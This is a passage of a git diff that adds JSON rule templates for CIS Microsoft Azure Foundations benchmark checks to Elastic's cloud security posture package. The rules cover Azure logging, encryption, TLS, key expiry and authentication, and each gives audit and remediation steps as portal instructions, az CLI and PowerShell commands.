existing diagnostic setting, or `Add diagnostic setting`\n5. If creating a new diagnostic setting, provide a name\n6. Check `Archive to a storage account`\n7. Under Categories, check `Audit Logs`\n8. Set an appropriate value for `Retention (days)`\n9. Click `Save`\n\n**From Azure CLI**\n\nTo update an existing `Diagnostic Settings`\n```\naz monitor diagnostic-settings update --name \"\" --resource --set retentionPolicy.days=90\n```\n\nTo create a new `Diagnostic Settings`\n\n```\naz monitor diagnostic-settings create --name --resource --logs \"[{category:AuditEvents,enabled:true,retention-policy:{enabled:true,days:180}}]\" --metrics \"[{category:AllMetrics,enabled:true,retention-policy:{enabled:true,days:180}}]\" <[--event-hub --event-hub-rule | --storage-account |--workspace | --marketplace-partner-id ]>\n```\n\n**From PowerShell**\n\nCreate the `Log` settings object\n\n```\n$logSettings = @()\n$logSettings += New-AzDiagnosticSettingLogSettingsObject -Enabled $true -RetentionPolicyDay 180 -RetentionPolicyEnabled $true -Category AuditEvent\n```\n\nCreate the `Metric` settings object\n\n```\n$metricSettings = @()\n$metricSettings += New-AzDiagnosticSettingMetricSettingsObject -Enabled $true -RetentionPolicyDay 180 -RetentionPolicyEnabled $true -Category AllMetrics\n```\n\nCreate the `Diagnostic Settings` for each `Key Vault`\n\n```\nNew-AzDiagnosticSetting -Name \"\" -ResourceId -Log $logSettings -Metric $metricSettings [-StorageAccountId | -EventHubName -EventHubAuthorizationRuleId | -WorkSpaceId | -MarketPlacePartnerId ]\n```", + "section": "Configuring Diagnostic Settings", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 5.1.5", + "Configuring Diagnostic Settings" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "5.1.5", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_5_1_5" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json b/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json new file mode 100644 index 00000000000..3e0b1e70afc --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json @@ -0,0 +1,38 @@ +{ + "id": "69ffe7f6-bc09-5019-ba77-a2f81169e9de", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-data-security\n2. https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-data-collection\n3. https://msdn.microsoft.com/en-us/library/mt704062.aspx\n4. https://msdn.microsoft.com/en-us/library/mt704063.aspx\n5. https://docs.microsoft.com/en-us/rest/api/securitycenter/autoprovisioningsettings/list\n6. https://docs.microsoft.com/en-us/rest/api/securitycenter/autoprovisioningsettings/create\n7. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-5-centralize-security-log-management-and-analysis\n8. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation\n9. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification", + "id": "69ffe7f6-bc09-5019-ba77-a2f81169e9de", + "name": "Ensure that Auto provisioning of 'Log Analytics agent for Azure VMs' is Set to 'On'", + "profile_applicability": "* Level 1", + "description": "Enable automatic provisioning of the monitoring agent to collect security data.", + "rationale": "When `Log Analytics agent for Azure VMs` is turned on, Microsoft Defender for Cloud provisions the Microsoft Monitoring Agent on all existing supported Azure virtual machines and any new ones that are created.\nThe Microsoft Monitoring Agent scans for various security-related configurations and events such as system updates, OS vulnerabilities, endpoint protection, and provides alerts.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Then `Environment Settings`\n4. Select a subscription\n5. Click on `Settings & Monitoring`\n6. Ensure that `Log Analytics agent/Azure Monitor agent` is set to `On`\n\nRepeat the above for any additional subscriptions.\n\n**From Azure CLI**\n\nEnsure the output of the below command is `On`\n\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions//providers/Microsoft.Security/autoProvisioningSettings?api-version=2017-08-01-preview' | jq '.|.value[] | select(.name==\"default\")'|jq '.properties.autoProvision'\n```\n\n**Using PowerShell**\n```\nConnect-AzAccount\nGet-AzSecurityAutoProvisioningSetting\n```\nEnsure output for `Id Name AutoProvision` is `/subscriptions//providers/Microsoft.Security/autoProvisioningSettings/default default On`", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Select `Environment Settings`\n4. Select a subscription\n5. Click on `Settings & Monitoring`\n6. Ensure that `Log Analytics agent for Azure VMs` is set to `On`\n\nRepeat the above for any additional subscriptions.\n\n**From Azure CLI**\n\nUse the below command to set `Automatic provisioning of monitoring agent` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/subscriptionID/providers/Microsoft.Security/autoProvisioningSettings/default?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the Request body json data as mentioned below.\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/autoProvisioningSettings/default\",\n \"name\": \"default\",\n \"type\": \"Microsoft.Security/autoProvisioningSettings\",\n \"properties\": {\n \"autoProvision\": \"On\"\n }\n}\n```", + "section": "Microsoft Defender for Cloud", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 2.1.15", + "Microsoft Defender for Cloud" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "2.1.15", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_2_1_15" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json b/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json new file mode 100644 index 00000000000..404af7ccd64 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json @@ -0,0 +1,38 @@ +{ + "id": "6e6481f1-5ede-552b-84e5-cceed281052a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/app-service/app-service-web-tutorial-custom-ssl#enforce-tls-versions\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-3-encrypt-sensitive-data-in-transit\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-8-detect-and-disable-insecure-services-and--protocols\n4. https://docs.microsoft.com/en-us/powershell/module/az.websites/set-azwebapp?view=azps-8.1.0", + "id": "6e6481f1-5ede-552b-84e5-cceed281052a", + "name": "Ensure Web App is using the latest version of TLS encryption", + "profile_applicability": "* Level 1", + "description": "The TLS (Transport Layer Security) protocol secures transmission of data over the internet using standard encryption technology.\nEncryption should be set with the latest version of TLS.\nApp service allows TLS 1.2 by default, which is the recommended TLS level by industry standards such as PCI DSS.", + "rationale": "App service currently allows the web app to set TLS versions 1.0, 1.1 and 1.2.\nIt is highly recommended to use the latest TLS 1.2 version for web app secure connections.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `TLS/SSL settings`\n5. Under the `Bindings` pane, ensure that `Minimum TLS Version` set to `1.2` under `Protocol Settings`\n\n**From Azure CLI**\n\nTo check TLS Version for an existing app, run the following command,\n```\naz webapp config show --resource-group --name --query minTlsVersion\n```\n\nThe output should return `1.2` if TLS Version is set to `1.2` (Which is currently the latest version).\n\n**From PowerShell**\n\nList all web apps.\n\n```\nGet-AzWebApp\n```\n\nFor each web app run the following command.\n\n```\nGet-AzWebApp -ResourceGroupName -Name |Select-Object -ExpandProperty SiteConfig\n```\n\nMake sure the `minTlsVersion` is set to at least `1.2`.", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `SSL settings`\n5. Under the `Bindings` pane, set `Minimum TLS Version` to `1.2` under `Protocol Settings` section\n\n**From Azure CLI**\n\nTo set TLS Version for an existing app, run the following command:\n```\naz webapp config set --resource-group --name --min-tls-version 1.2\n```\n\n**From PowerShell**\n\n```\nSet-AzWebApp -ResourceGroupName -Name -MinTlsVersion 1.2\n```", + "section": "AppService", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 9.3", + "AppService" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "9.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_9_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json b/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json new file mode 100644 index 00000000000..8ab89d26d1a --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json @@ -0,0 +1,38 @@ +{ + "id": "70f92ed3-5659-5c95-a8f8-a63211c57635", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "The read and write speeds to the database will be impacted if both default encryption and Infrastructure Encryption are checked, as a secondary form of encryption requires more resource overhead for the cryptography of information. This cost is justified for information security.\nCustomer managed keys are recommended for the most secure implementation, leading to overhead of key management. The key will also need to be backed up in a secure location, as loss of the key will mean loss of the information in the database.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/howto-double-encryption\n2. https://docs.microsoft.com/en-us/azure/postgresql/concepts-infrastructure-double-encryption\n3. https://docs.microsoft.com/en-us/azure/postgresql/concepts-data-encryption-postgresql\n4. https://docs.microsoft.com/en-us/azure/key-vault/keys/byok-specification\n5. https://docs.microsoft.com/en-us/azure/postgresql/howto-double-encryption\n6. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default", + "id": "70f92ed3-5659-5c95-a8f8-a63211c57635", + "name": "Ensure 'Infrastructure double encryption' for PostgreSQL Database Server is 'Enabled'", + "profile_applicability": "* Level 1", + "description": "Azure Database for PostgreSQL servers should be created with 'infrastructure double encryption' enabled.", + "rationale": "If Double Encryption is enabled, another layer of encryption is implemented at the hardware level before the storage or network level.\nInformation will be encrypted before it is even accessed, preventing both interception of data in motion if the network layer encryption is broken and data at rest in system resources such as memory or processor cache.\nEncryption will also be in place for any backups taken of the database, so the key will secure access the data in all forms.\nFor the most secure implementation of key based encryption, it is recommended to use a Customer Managed asymmetric RSA 2048 Key in Azure Key Vault.", + "audit": "**From Azure Portal**\n\n1. From Azure Home, click on more services.\n2. Click on Databases.\n3. Click on Azure Database for PostgreSQL servers.\n4. Select the database by clicking on its name.\n5. Under Security, click Data encryption.\n6. Ensure that 'Infrastructure encryption enabled' is displayed and is 'checked'.\n\n**From Azure CLI**\n\n7. Enter the command\n```\naz postgres server configuration show --name --resource-group --query 'properties.infrastructureEncryption' -o tsv\n```\n8. Verify that Infrastructure encryption is enabled.", + "remediation": "It is not possible to enable 'infrastructure double encryption' on an existing Azure Database for PostgreSQL server.\nThe remediation steps detail the creation of a new Azure Database for PostgreSQL server with 'infrastructure double encryption' enabled.\n\n**From Azure Portal**\n\n1. Go through the normal process of database creation.\n2. On step 2 titled 'Additional settings' ensure that 'Infrastructure double encryption enabled' is 'checked'.\n3. Acknowledge that you understand this will impact database performance.\n4. Finish database creation as normal.\n\n**From Azure CLI**\n\n```\naz postgres server create --resource-group --name --location --admin-user --admin-password --sku-name GP_Gen4_2 --version 11 --infrastructure-encryption Enabled\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.8", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.8", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_8" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json b/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json new file mode 100644 index 00000000000..c58db3da041 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json @@ -0,0 +1,38 @@ +{ + "id": "737dc646-1c66-5fb6-8fcd-1aac6402532d", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Enabling this setting can have a high impact on the cost of the log analytics service and data storage used by logging more data per each request. Do not enable this without determining your need for this level of logging, and do not forget to check in on data usage and projected cost. Some users have seen their logging costs increase from $10 per month to $10,000 per month.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://docs.microsoft.com/en-us/azure/storage/queues/monitor-queue-storage?tabs=azure-portal", + "id": "737dc646-1c66-5fb6-8fcd-1aac6402532d", + "name": "Ensure Storage Logging is Enabled for Queue Service for 'Read', 'Write', and 'Delete' requests", + "profile_applicability": "* Level 2", + "description": "The Storage Queue service stores messages that may be read by any client who has access to the storage account.\nA queue can contain an unlimited number of messages, each of which can be up to 64KB in size using version 2011-08-18 or newer.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the queues.\nStorage Logging log entries contain the following information about individual requests: Timing information such as start time, end-to-end latency, and server latency, authentication details, concurrency information, and the sizes of the request and response messages.", + "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor individual requests and to diagnose issues with a storage service.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for your storage account.", + "audit": "**From Azure Portal:**\n1. Go to `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings (classic)` blade from `Monitoring (classic)` section.\n4. Ensure the `Status` is set to `On`, if set to `Off`.\n5. Select `Queue properties`.\n6. Ensure `Read` `Write` `Delete` options are selected under the `Logging` section.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties `delete`, `read` and `write` set to `true`.\n```\naz storage logging show --services q --account-name \n```", + "remediation": "**From Azure Portal**\n1. Go to `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings (classic)` blade from `Monitoring (classic)` section.\n4. Set the `Status` to `On`, if set to `Off`.\n5. Select `Queue properties`.\n6. Select `Read`, `Write` and `Delete` options under the `Logging` section to enable Storage Logging for Queue service.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Queue service.\n```\naz storage logging update --account-name --account-key --services q --log rwd --retention 90\n```", + "section": "Storage Accounts", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 3.5", + "Storage Accounts" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "3.5", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_3_5" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json b/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json new file mode 100644 index 00000000000..ea4b61d794c --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json @@ -0,0 +1,38 @@ +{ + "id": "7bb02abe-d669-5058-a2d6-6ce5ee2dc2be", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Keys cannot be used beyond their assigned expiration dates respectively. Keys need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-keys\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultkeyattribute?view=azps-0.10.0", + "id": "7bb02abe-d669-5058-a2d6-6ce5ee2dc2be", + "name": "Ensure that the Expiration Date is set for all Keys in Non-RBAC Key Vaults.", + "profile_applicability": "* Level 1", + "description": "Ensure that all Keys in Non Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the key MUST NOT be used for a cryptographic operation.\nBy default, keys never expire.\nIt is thus recommended that keys be rotated in the key vault and set an explicit expiration date for all keys.\nThis ensures that the keys cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that the status of the key is `Enabled`.\n4. For each enabled key, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nFor each key vault, ensure that the output of the below command contains Key ID (kid), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault key list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}' \n```\n\n**From PowerShell:**\n\nRetrieve a list of Azure Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault, run the following command to determine which vaults are configured to not use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `False` or empty, run the following command.\n\n```\nGet-AzKeyVaultKey -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that the status of the key is `Enabled`.\n4. For each enabled key, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the key using the below command:\n\n```\naz keyvault key set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\n**Note:**\nTo view the expiration date on all keys in a Key Vault using Microsoft API, the \"List\" Key permission is required.\n\nTo update the expiration date for the keys:\n5. Go to Key vault, click on `Access policies`.\n6. Click on `Create` and add an access policy with the `Update` permission (in the Key Permissions - Key Management Operations section).\n\n**From PowerShell**\n\n```\nSet-AzKeyVaultKeyAttribute -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.2", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.2", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_2" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json b/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json new file mode 100644 index 00000000000..c0fa9d20877 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json @@ -0,0 +1,38 @@ +{ + "id": "87952b8d-f537-5f8a-b57b-63a31b031170", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification", + "id": "87952b8d-f537-5f8a-b57b-63a31b031170", + "name": "Ensure 'Additional email addresses' is Configured with a Security Contact Email", + "profile_applicability": "* Level 1", + "description": "Microsoft Defender for Cloud emails the subscription owners whenever a high-severity alert is triggered for their subscription.\nYou should provide a security contact email address as an additional email address.", + "rationale": "Microsoft Defender for Cloud emails the Subscription Owner to notify them about security alerts.\nAdding your Security Contact's email address to the 'Additional email addresses' field ensures that your organization's Security Team is included in these alerts.\nThis ensures that the proper people are aware of any potential compromise in order to mitigate the risk in a timely fashion.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that a valid security contact email address is listed in the `Additional email addresses` field \n\n**From Azure CLI**\n\nEnsure the output of the below command is set not empty and is set with appropriate email ids.\n\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.[] | select(.name==\"default\")'|jq '.properties.emails'\n```", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Enter a valid security contact email address (or multiple addresses separated by commas) in the `Additional email addresses` field \n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Security contact emails` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default?api-version=2020-01-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default\",\n \"name\": \"default\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\"\n }\n }\n```", + "section": "Microsoft Defender for Cloud", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 2.1.19", + "Microsoft Defender for Cloud" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "2.1.19", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_2_1_19" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json b/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json new file mode 100644 index 00000000000..ae3ad10017f --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json @@ -0,0 +1,38 @@ +{ + "id": "88734e31-d055-58ba-bf70-7d40d0b4e707", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "This is only required for App Services which require authentication. Enabling on site like a marketing or support website will prevent unauthenticated access which would be undesirable.\n\nAdding Authentication requirement will increase cost of App Service and require additional security components to facilitate the authentication.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/app-service/app-service-authentication-overview\n2. https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#website-contributor\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-privileged-access#pa-5-automate-entitlement-management\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-governance-strategy#gs-6-define-identity-and-privileged-access-strategy", + "id": "88734e31-d055-58ba-bf70-7d40d0b4e707", + "name": "Ensure App Service Authentication is set up for apps in Azure App Service", + "profile_applicability": "* Level 2", + "description": "Azure App Service Authentication is a feature that can prevent anonymous HTTP requests from reaching a Web Application or authenticate those with tokens before they reach the app.\nIf an anonymous request is received from a browser, App Service will redirect to a logon page.\nTo handle the logon process, a choice from a set of identity providers can be made, or a custom authentication mechanism can be implemented.", + "rationale": "By Enabling App Service Authentication, every incoming HTTP request passes through it before being handled by the application code.\nIt also handles authentication of users with the specified provider (Azure Active Directory, Facebook, Google, Microsoft Account, and Twitter), validation, storing and refreshing of tokens, managing the authenticated sessions and injecting identity information into request headers.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `Authentication`\n5. Ensure that `App Service authentication` set to `Enabled` (Will only appear once an Identity provider is set up/selected)\n\n**From Azure CLI**\n\nTo check App Service Authentication status for an existing app, run the following command,\n\n```\naz webapp auth show --resource-group --name --query enabled\n```\n\nThe output should return `true` if App Service authentication is set to `On`.", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, click on `Authentication`\n5. If no identity providers are set up, then click `Add identity provider`\n6. Choose other parameters as per your requirements and click on `Add`\n\n**From Azure CLI**\n\nTo set App Service Authentication for an existing app, run the following command:\n```\naz webapp auth update --resource-group --name --enabled true\n```\n**Note**\n\nIn order to access `App Service authentication` settings for Web app using Microsoft API requires `Website contributor` permission at subscription level.\nA custom role can be created in place of `Website contributor` to provide more specific permission and maintain the principle of least privileged access.", + "section": "AppService", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 9.1", + "AppService" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "9.1", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_9_1" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json b/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json new file mode 100644 index 00000000000..0d3038cf350 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json @@ -0,0 +1,38 @@ +{ + "id": "89ebec6b-3cc4-5898-a3b9-534174f93051", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/sql/relational-databases/security/encryption/transparent-data-encryption-with-azure-sql-database\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default\n3. https://learn.microsoft.com/en-us/powershell/module/az.sql/set-azsqldatabasetransparentdataencryption?view=azps-9.2.0", + "id": "89ebec6b-3cc4-5898-a3b9-534174f93051", + "name": "Ensure that 'Data encryption' is set to 'On' on a SQL Database", + "profile_applicability": "* Level 1", + "description": "Enable Transparent Data Encryption on every SQL server.", + "rationale": "Azure SQL Database transparent data encryption helps protect against the threat of malicious activity by performing real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.", + "audit": "**From Azure Portal**\n\n1. Go to `SQL databases`\n2. For each DB instance\n3. Click on `Transparent data encryption`\n4. Ensure that `Data encryption` is set to `On`\n\n**From Azure CLI**\n\nEnsure the output of the below command is `Enabled`\n\n```\naz sql db tde show --resource-group --server --database --query status\n```\n\n**From PowerShell**\n\nGet a list of SQL Servers.\n\n```\nGet-AzSqlServer\n```\n\nFor each server, list the databases.\n\n```\nGet-AzSqlDatabase -ServerName -ResourceGroupName \n```\n\nFor each database not listed as a `Master` database, check for Transparent Data Encryption.\n\n```\nGet-AzSqlDatabaseTransparentDataEncryption -ResourceGroupName -ServerName -DatabaseName \n```\n\nMake sure `DataEncryption` is `Enabled` for each database except the `Master` database.", + "remediation": "**From Azure Portal**\n\n1. Go to `SQL databases`\n2. For each DB instance\n3. Click on `Transparent data encryption`\n4. Set `Data encryption` to `On`\n\n**From Azure CLI**\n\nUse the below command to enable `Transparent data encryption` for SQL 